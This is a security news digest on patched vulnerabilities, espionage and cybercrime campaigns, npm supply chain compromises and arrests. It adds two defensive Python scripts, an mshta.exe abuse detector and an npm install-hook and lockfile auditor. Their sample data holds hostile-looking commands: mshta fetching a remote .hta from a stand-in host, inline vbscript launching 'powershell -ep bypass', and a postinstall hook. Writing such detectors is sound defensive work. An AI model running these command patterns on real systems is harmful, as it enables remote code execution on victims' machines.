Microsoft has released security updates for two Microsoft Defender vulnerabilities that have been actively exploited as zero-days. The first flaw, tracked as CVE-2026-41091, affects Microsoft Malware Protection Engine version 1.1.26030.3008 and earlier. The second (CVE-2026-45498) affects systems running Microsoft Defender Antimalware Platform version 4.18.26030.3011 and earlier. The vendor has also patched a critical remote code execution flaw (CVE-2026-45584) in the Malware Protection Engine caused by a boundary error. There is currently no indication that this third vulnerability is being exploited in the wild. Note that the engine and platform are delivered through Defender's own update channel rather than the monthly cumulative update, so checking the installed engine and platform versions is the reliable way to confirm a system is fixed.
Separately, Microsoft released a mitigation for a BitLocker bypass vulnerability (CVE-2026-45585) aka YellowKey after a proof-of-concept was made public last week. The flaw affects Windows 11 version 26H1 for x64-based Systems, Windows 11 Version 24H2 for x64-based Systems, Windows 11 Version 25H2 for x64-based Systems, Windows Server 2025, and Windows Server 2025 (Server Core installation).
The US Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2026-41091 and CVE-2026-45498 to its Known Exploited Vulnerabilities (KEV) catalog, along with a number of older vulnerabilities affecting Internet Explorer (CVE-2010-0249, CVE-2010-0806), Windows (CVE-2008-4250), DirectX (CVE-2009-1537), and Adobe Acrobat (CVE-2009-3459).
Drupal maintainers issued security updates to address an SQL injection vulnerability (CVE-2026-9082) in the Drupal API. Only sites using PostgreSQL databases are affected. The flaw can be exploited without authentication, and successful exploitation can lead to information disclosure and, in some cases, privilege escalation or remote code execution.
F5 has released security updates to fix a number of vulnerabilities in the NGINX HTTP server that can be exploited to cause a denial-of-service (DoS) condition or to achieve remote code execution.
Ivanti, Fortinet, VMware, and n8n released patches for multiple critical vulnerabilities that could allow authentication bypass, remote code execution, SQL injection, and privilege escalation. The most important issues include an Ivanti Xtraction flaw (CVE-2026-8043), two Fortinet flaws (CVE-2026-44277 and CVE-2026-26083), a VMware Fusion flaw (CVE-2026-41702), and several critical n8n vulnerabilities (CVE-2026-42231, CVE-2026-42232, CVE-2026-44789, CVE-2026-44790, and CVE-2026-44791) that could lead to remote code execution and full system compromise.
Hackers are exploiting a critical flaw (CVE-2024-9643) in Four-Faith industrial routers to recruit the devices into botnets. Security researchers at CrowdSec report a sharp increase in attack volume, indicating that attackers have moved from testing the vulnerability to large-scale exploitation. The attacks originate from multiple countries, including the UK, Germany, the US, and the Netherlands.
Researchers at ReliaQuest warn that hackers are actively exploiting a SonicWall vulnerability (CVE-2024-12802) in real-world attacks. ReliaQuest found that some devices remained vulnerable even after a firmware update because the additional remediation steps were not completed. For SonicWall Gen7 and Gen8 devices, however, installing the latest firmware update alone is enough to fully fix the issue.
The Russian state-linked cyber-espionage group tracked as Secret Blizzard (also known as Turla, Uroburos, and Venomous Bear) has upgraded its Kazuar malware, turning the backdoor into a modular peer-to-peer (P2P) botnet designed for stealth, persistence, and intelligence collection.
Ukraine's computer emergency response team, CERT-UA, has issued a security advisory detailing phishing attacks against government organizations. The attackers send fraudulent emails with PDF links that lead to the download of malicious files and malware, including OYSTERFRESH, OYSTERBLUES, OYSTERSHUCK, and Cobalt Strike. The campaign is attributed to the Belarus-affiliated UAC-0057 group (aka UNC1151, Ghostwriter, Storm-0257).
A previously undocumented malware implant dubbed 'TencShell' was spotted in an attack on an unnamed global manufacturing company. The activity was traced to a third-party user connection into the customer’s India-based environment. TencShell appears to be the work of a Chinese-affiliated threat actor, though there’s not enough evidence for definitive attribution.
Darktrace researchers have uncovered a suspected China-nexus cyber-espionage campaign linked to the Twill Typhoon threat group targeting organizations across the Asia-Pacific and Japan (APJ) region. The operation, first observed in late September 2025, leveraged CDN impersonation, DLL sideloading, and modular malware delivery to deploy a sophisticated .NET-based remote access trojan (RAT).
A China-aligned advanced persistent threat group, tracked as Webworm, has been updating its arsenal with new custom tools and backdoors since 2025. According to ESET, Webworm, previously associated with China-linked groups SixLittleMonkeys and FishMonger, has shifted from the McRat (9002 RAT) and Trochilus remote access trojans to lightweight proxy infrastructure and cloud-based command-and-control (C&C) mechanisms designed to evade detection.
Lumen's Black Lotus Labs discovered a new Linux malware family called Showboat that targets telecommunications organizations in several regions. The malware is a modular tool that can remotely control infected systems, transfer files, and act as a SOCKS5 proxy. Researchers found that the campaign affected a telecom provider in the Middle East and used fake telecom company identities in Southeast Asia. The activity is linked to at least one, and likely several, China-aligned threat groups.
Cybersecurity firm Seqrite Labs has released a report on a spear-phishing campaign targeting the Chinese education sector. The campaign, dubbed Operation Dragon Whistle, has been attributed to a threat actor the company tracks as UNG0002.
The Fast16 malware platform appears to have been engineered to manipulate nuclear-weapons simulations inside advanced engineering software used for high-explosive modeling. The most recent analysis by Symantec links the malware directly to LS-DYNA and Autodyn, two industrial simulation suites widely used for modeling detonations, material stress, and implosion physics.
Google Threat Intelligence Group (GTIG) details a cybercrime group called UNC6671 aka “BlackFile.” The group uses voice phishing (vishing) and fake login pages to steal employee credentials and bypass multi-factor authentication (MFA). The threat actor mainly targets Microsoft 365 and Okta systems, using scripts to steal sensitive company data and then extort organizations. Since early 2026, UNC6671 has attacked dozens of companies in North America, Australia, and the UK. Although the group has sometimes used the ShinyHunters name, GTIG believes UNC6671 operates independently with its own tools, domains, and BlackFile leak site.
Cybercriminals are still abusing MSHTA (mshta.exe), a legacy Windows binary that executes HTML Applications and embedded script from local or remote files, Bitdefender researchers warn. Because it is a signed Microsoft binary, attackers use it as part of "living off the land" tactics to launch malware such as password stealers and more advanced payloads. Recent campaigns included fake Google ads for Claude Code, ClickFix attacks delivering LummaStealer and CastleLoader, and malware hidden in pirated downloads.
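As an added example (not part of the original report or Bitdefender's research), the following Python script shows the kind of detection logic a SOC would run over process-creation telemetry to catch the mshta.exe abuse patterns described above: a remote URL argument, inline script via the vbscript:/javascript:/about: handlers, a non-.hta polyglot file, and a launch from an Office, shell, or browser parent. The sample events are constructed for the example; the paths, hostnames, and field names are assumptions, not real telemetry.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry). The field
# names mirror a normalised Sysmon Event ID 1 / Security 4688 record.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe https://cdn.example.invalid/update/x.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\u\AppData\Local\Temp\update.hta"'},
    {"image": r"C:\Windows\SysWOW64\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -ep bypass"":close")'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Users\u\Downloads\invoice.jpg"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\console.hta"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe https://example.invalid/readme.txt"},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# mshta executes script passed inline through these protocol handlers,
# so no .hta file ever needs to touch disk.
INLINE_SCRIPT = re.compile(r"\b(?:vbscript|javascript|about):", re.IGNORECASE)
# Parents from which an HTA launch is rarely legitimate: Office apps
# (macro/OLE abuse), shells and script hosts (ClickFix-style chains), browsers.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "chrome.exe", "msedge.exe", "firefox.exe",
}


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased (os.path will not split backslashes on POSIX)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def first_argument(cmdline: str) -> str:
    """First argument after the program token, honouring double-quoted tokens."""
    tokens = [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]
    return tokens[1] if len(tokens) > 1 else ""


def flag_mshta(event: Dict[str, str]) -> List[str]:
    """Return the reasons an mshta.exe launch looks suspicious (empty list if benign)."""
    if basename(event["image"]) != "mshta.exe":
        return []
    reasons: List[str] = []
    cmdline = event["cmdline"]
    arg = first_argument(cmdline)
    if REMOTE_URL.search(cmdline):
        reasons.append("remote_url")
    if INLINE_SCRIPT.search(cmdline):
        reasons.append("inline_script")
    # A local file that is not an .hta (image, txt, ...) is the polyglot trick:
    # mshta ignores the extension and parses whatever HTML it finds inside.
    if arg and not REMOTE_URL.search(arg) and not INLINE_SCRIPT.search(arg) \
            and not arg.lower().endswith(".hta"):
        reasons.append("non_hta_argument")
    parent = basename(event["parent"])
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"suspicious_parent:{parent}")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run flag_mshta over a batch and keep only the hits, keyed by event index."""
    hits = []
    for idx, event in enumerate(events):
        reasons = flag_mshta(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The fourth sample (a vendor console .hta launched from explorer.exe) deliberately produces no hit, which is the false-positive case to keep in mind: some line-of-business tools still ship HTAs, so in environments where mshta.exe has no legitimate use the cleaner control is to block it outright with AppLocker or WDAC and treat any execution as an alert.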
Grafana has disclosed that an unauthorized party gained access to its GitHub environment using a compromised token, which allowed the attacker to download the company's codebase. The compromise stemmed from the TanStack npm supply chain attack carried out as part of the Mini Shai-Hulud campaign. The company said the threat actor downloaded some source code as well as GitHub repositories that some Grafana Labs teams use for business communication.
Microsoft said it discovered an active supply chain attack targeting packages in the @antv npm namespace. A threat actor compromised an @antv maintainer account and published malicious versions of widely used data-visualization packages, with cascading impact on downstream dependents.
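Both the Grafana token theft and the @antv maintainer-account compromise above are npm supply chain incidents, and the first question a practitioner asks after either is "what in my dependency tree runs code at install time, and did every tarball come from where I expect?" The following Python script is an added example, not code from Microsoft, Grafana Labs, or the npm project: it lists packages that declare install-time lifecycle scripts and audits a lockfileVersion 3 package-lock.json for tarballs resolved outside the registry or lacking an integrity hash. The package names, versions, and hostnames in the fixtures are constructed for the example.

```python
import json
import os
from typing import Dict, List, Tuple

# Lifecycle scripts npm may run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
DEFAULT_REGISTRY = "https://registry.npmjs.org/"

# Constructed package.json fixtures (hypothetical names, not real packages).
SAMPLE_PACKAGES: List[Dict] = [
    {"name": "@example/viz-core", "version": "1.2.3",
     "scripts": {"build": "tsc -p .", "test": "vitest"}},
    {"name": "@example/viz-util", "version": "4.0.1",
     "scripts": {"postinstall": "node bundle.js"}},
    {"name": "tiny-helper", "version": "0.3.0"},
]

# Constructed package-lock.json (lockfileVersion 3 layout) for the same tree.
SAMPLE_LOCK: Dict = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "0.0.1"},
        "node_modules/@example/viz-core": {
            "version": "1.2.3",
            "resolved": "https://registry.npmjs.org/@example/viz-core/-/viz-core-1.2.3.tgz",
            "integrity": "sha512-AAAA"},
        "node_modules/@example/viz-util": {
            "version": "4.0.1",
            "resolved": "https://cdn.example.invalid/viz-util-4.0.1.tgz",
            "integrity": "sha512-BBBB"},
        "node_modules/tiny-helper": {
            "version": "0.3.0",
            "resolved": "https://registry.npmjs.org/tiny-helper/-/tiny-helper-0.3.0.tgz"},
    },
}


def install_hooks(pkg: Dict) -> Dict[str, str]:
    """Scripts in a package.json that execute on install, e.g. {'postinstall': 'node bundle.js'}."""
    scripts = pkg.get("scripts") or {}
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def packages_with_hooks(pkgs: List[Dict]) -> List[Tuple[str, str, Dict[str, str]]]:
    """(name, version, hooks) for every package that declares an install-time script."""
    out = []
    for pkg in pkgs:
        hooks = install_hooks(pkg)
        if hooks:
            out.append((pkg.get("name", "?"), pkg.get("version", "?"), hooks))
    return out


def audit_lockfile(lock: Dict, registry: str = DEFAULT_REGISTRY) -> List[Tuple[str, str]]:
    """Flag lockfile entries whose tarball does not come from the expected registry
    or that carry no integrity hash (so npm cannot verify what it downloaded)."""
    findings = []
    for path, meta in (lock.get("packages") or {}).items():
        if path == "" or meta.get("link"):
            continue  # the root project itself, or a workspace symlink
        name = path.rsplit("node_modules/", 1)[-1]
        resolved = meta.get("resolved", "")
        if not resolved.startswith(registry):
            findings.append((name, f"resolved outside registry: {resolved or '<none>'}"))
        if not meta.get("integrity"):
            findings.append((name, "missing integrity hash"))
    return findings


def scan_node_modules(root: str) -> List[Tuple[str, str, Dict[str, str]]]:
    """Walk a real node_modules tree and report installed packages with install hooks."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            try:
                with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                    found.extend(packages_with_hooks([json.load(fh)]))
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest; skip it
    return found


if __name__ == "__main__":
    for name, version, hooks in packages_with_hooks(SAMPLE_PACKAGES):
        print(f"{name}@{version} runs on install: {hooks}")
    for name, issue in audit_lockfile(SAMPLE_LOCK):
        print(f"{name}: {issue}")
```

Two caveats apply. Setting ignore-scripts=true in .npmrc stops install hooks from running at all, which blunts the common postinstall-dropper pattern, but a malicious version that only changes runtime code still executes the first time the package is imported; for that case the only defences are version pinning through the lockfile, a delay before adopting freshly published versions, and reviewing the diff of any dependency that jumps versions unexpectedly.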
GitHub has confirmed that around 3,800 internal repositories were compromised after an employee installed a malicious Visual Studio Code extension. The TeamPCP hacker group took responsibility for the breach on the Breached cybercrime forum earlier this week. The group claimed it had obtained access to GitHub source code and roughly 4,000 private repositories, demanding at least $50,000 for the stolen data.
A new variant of the SHub macOS infostealer is using AppleScript and fake security prompts to infect users’ systems and install a persistent backdoor. The updated malware, dubbed “Reaper,” targets macOS users via fake installers for popular applications including WeChat and Miro.
An international law enforcement operation has dismantled a VPN service widely used by cybercriminals to hide ransomware attacks, data theft, and large-scale fraud. The service, known as “First VPN,” had been promoted for years on Russian-speaking cybercrime forums as a secure way for criminals to evade law enforcement via anonymous payments and hidden infrastructure.
Additionally, the US FBI has released a FLASH alert with indicators of compromise (IoCs) and identified tactics, techniques, and procedures (TTPs) associated with the First VPN Service. The service has been active since around 2014 and currently provides 32 exit node servers in 27 countries, the FBI said, noting that at least 25 ransomware groups, such as Avaddon Ransomware, have used First VPN Service infrastructure for network reconnaissance and intrusions.
Microsoft took action against a major cybercrime operation that enabled threat actors to distribute ransomware and other malware signed with fraudulently obtained code-signing certificates. The company said a threat actor it tracks as Fox Tempest operated a malware-signing-as-a-service (MSaaS) platform that abused Microsoft Artifact Signing to obtain short-lived certificates, allowing malware to appear as legitimate software.
A large-scale cybercrime crackdown, codenamed “Operation Ramz,” across the Middle East and North Africa (MENA) has resulted in 201 arrests and the identification of 382 additional suspects linked to phishing, malware, and online fraud schemes.
Conducted between October 2025 and February 2026, the operation involved law enforcement agencies from 13 countries aiming to dismantle malicious cyber infrastructure and disrupt phishing campaigns.
US authorities charged Jacob Butler, a 23-year-old Canadian national, with running the KimWolf DDoS botnet that infected more than one million internet-connected devices worldwide. The charges were unsealed after Butler was arrested in Canada. KimWolf was a DDoS-for-hire operation that allowed users to launch cyberattacks; it was shut down in March 2026 along with the Aisuru, JackSkid, and Mossad IoT botnets.
Two former business executives, Adam Young and Harrison Gevirtz, pleaded guilty to helping international tech-support scam operations. Their company provided phone and call-routing services to scammers who tricked victims into paying for fake technical support and, in some cases, stole personal information. Prosecutors said the executives knew about the illegal activity for years, helped scammers avoid detection, and connected them with other service providers. Both pleaded guilty to concealing known criminal activity. Their sentencing is set for June 16, 2026.
Ukrainian authorities have detained an 18-year-old man suspected of involvement with an international cybercrime crew that compromised nearly 30,000 customer accounts linked to a US online retailer. The group used info-stealing malware to collect login credentials and session data, which were later sold through online platforms and Telegram channels. The suspect is accused of managing the infrastructure used to process and sell the stolen data and of handling cryptocurrency transactions.
The US National Security Agency (NSA) has released security design considerations for AI-driven automation built on the Model Context Protocol (MCP). The agency notes that while MCP simplifies the integration of diverse capabilities into powerful agent workflows, it also requires caution in how those integrations are designed and deployed.